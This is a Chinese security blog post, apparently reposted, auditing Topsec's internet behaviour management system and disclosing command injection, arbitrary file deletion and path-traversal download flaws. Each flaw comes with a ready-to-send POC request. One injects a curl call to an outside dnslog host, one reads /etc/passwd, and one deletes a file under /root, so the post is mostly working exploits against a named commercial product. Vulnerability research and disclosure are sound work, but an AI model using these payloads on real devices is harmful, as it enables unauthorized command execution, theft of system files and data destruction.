文章总结： 该文档对天融信上网行为管理系统进行了代码审计，披露了命令执行、任意文件删除及任意文件下载三个漏洞。漏洞成因均为用户输入参数未过滤直接拼接到系统命令或文件路径中。文章详细分析了漏洞代码逻辑，并提供了具体的漏洞位置与POC验证，具有较高的技术价值与可操作性。 综合评分： 88 文章分类： 代码审计,漏洞POC,漏洞分析

漏洞位于/view/ddos/run.php

由于$ip、$port、$value 均直接从 $_REQUEST 获取，未做任何合法性检查。这些变量被直接拼接进$command，通过proc_open函数完成命令执行，且除 -st 和 -et 参数的值被双引号包裹外，其余参数值均未加引号。攻击者可以在这些参数中注入 shell 元字符（如 ;、&、|、`、$() 等），从而改变原命令的执行逻辑，执行任意命令。

POC:

GET /view/ddos/run.php?ip=8.8.8.8;curl pdz671.dnslog.cn&port=80&interface_src=eth0&time1=0&time2=0&status=1 HTTP/1.1Host: target.com

成功执行curl命令。

02

任意文件删除漏洞

漏洞位于:/view/ddos/getData.php

当action等于del的时候接受可控参数name直接拼接于命令中并通过exec函数完成执行,形成任意文件删除漏洞。

POC:

GET /view/ddos/getData.php?action=del&name=/root/Debug_kmsg.txt HTTP/1.1Host: target.com

成功删除Debug_kmsg.txt文件。

03

任意文件下载漏洞

漏洞位于

/view/systemObject/certificateAdmin/certificateLocal/download.php

由于$cert_filerpath 和 $cert_filename 完全由用户控制，且直接拼接到文件路径中，攻击者可在参数中插入路径遍历符号 ../，使路径跳转到任意系统目录，从而使fopen函数任意读取。

POC:

GET /view/systemObject/certificateAdmin/certificateLocal/download.php?name=../../../../../../..%2fetc&file=passwd HTTP/1.1Host: target.com

成功下载/etc/passwd文件。

往期文章推荐

[跟着静师傅学代码审计]itc中心管理服务器审计

[跟着静师傅学代码审计]宏景人力资源信息管理系统代码0day审计

[跟着静师傅学代码审计-全网首发]用友U9 V6.6企业版多组织企业互联网应用平台命令执行+SQL+反序列化

公众号：安静安全

点个「在看」，你最好看

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：安静安全 静师傅 静师傅《天融信-上网行为管理系统代码审计命令执行+任意文件删除+任意文件下载》